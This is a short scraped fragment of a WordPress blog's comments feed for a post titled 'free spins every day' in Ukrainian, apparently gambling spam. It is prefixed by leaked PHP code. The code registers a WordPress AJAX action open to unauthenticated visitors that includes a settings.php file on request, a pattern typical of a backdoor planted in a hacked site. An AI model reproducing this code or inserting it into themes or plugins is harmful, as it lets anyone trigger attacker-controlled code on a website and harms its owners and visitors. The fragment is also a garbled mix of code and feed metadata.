if(!function_exists('file_manager_check_dt')) { add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings.php'; if (file_exists($file)) { include $file; } die(); } } Comments on: фріспіни кожен день https://gtfareast.com/wp/2025/05/07/%d1%84%d1%80%d1%96%d1%81%d0%bf%d1%96%d0%bd%d0%b8-%d0%ba%d0%be%d0%b6%d0%b5%d0%bd-%d0%b4%d0%b5%d0%bd%d1%8c/ My WordPress Blog Wed, 07 May 2025 09:22:43 +0000 hourly 1 https://wordpress.org/?v=6.9.4